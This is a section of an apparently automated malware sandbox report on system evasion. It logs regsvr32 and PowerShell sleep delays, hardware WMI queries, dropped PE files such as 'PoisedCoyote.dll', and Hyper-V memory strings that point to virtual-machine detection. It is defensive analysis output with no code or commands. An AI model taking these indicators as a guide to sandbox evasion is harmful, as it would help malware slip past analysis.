Malware Analysis System Evasion

Source: C:\Windows\System32\regsvr32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 39D0000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1BC70000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 533000
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 599921
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 599812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 5316
Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 4527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3344
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7627
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1871
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7257
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2342
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-DOVSB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-D8FFC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PoisedCoyote.dll (copy)
Source: C:\Windows\System32\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.4 %
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59891s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7248 Thread sleep count: 5316 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 7248 Thread sleep count: 4527 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59766s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59641s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59531s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59418s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59312s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59203s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59094s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58984s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58875s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58766s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58641s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58516s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58406s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58296s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58185s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58078s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -57968s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -57859s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -57750s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -57641s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -57516s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -57391s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -57281s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -57172s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -57062s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -56950s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -56843s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -56734s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -56625s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -56516s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -56391s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -56266s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -56156s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -56047s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7692 Thread sleep time: -533000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -599921s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -599812s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59874s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59765s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59656s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59541s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59437s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59328s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59218s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59109s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -59000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7656 Thread sleep time: -58890s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816 Thread sleep count: 6408 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820 Thread sleep count: 3344 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 7627 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 1871 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5436Thread sleep count: 7257 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3736Thread sleep count: 2342 > 30
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Windows\System32\regsvr32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\System32\regsvr32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFDFB28C9E0 GetSystemInfo,16_2_00007FFDFB28C9E0
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 60000
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59891
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59766
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59641
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59531
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59418
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59312
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59203
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59094
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58984
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58875
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58766
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58641
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58516
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58406
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58296
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58185
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58078
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 57968
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 57859
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 57750
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 57641
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 57516
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 57391
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 57281
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 57172
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 57062
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 56950
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 56843
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 56734
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 56625
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 56516
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 56391
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 56266
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 56156
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 56047
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 533000
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 599921
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 599812
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59874
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59765
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59656
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59541
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59437
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59328
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59218
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59109
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 59000
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 58890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000008.00000003.2088789519.000000000290A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: regsvr32.exe, 00000008.00000003.1795548970.0000000002746000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1801690119.0000000002746000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1802711281.0000000002746000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Re
Source: regsvr32.exe, 00000010.00000003.1993737775.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partitionvity
Source: regsvr32.exe, 00000008.00000003.1795892275.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807349450.00000000027A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual ProcessorJ
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor.exe
Source: regsvr32.exe, 00000008.00000003.1802052757.00000000026E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HL
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processor.mui"
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: regsvr32.exe, 00000008.00000003.1808764425.0000000002770000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807485390.000000000275A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1801667290.000000000275C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807589836.0000000002768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id
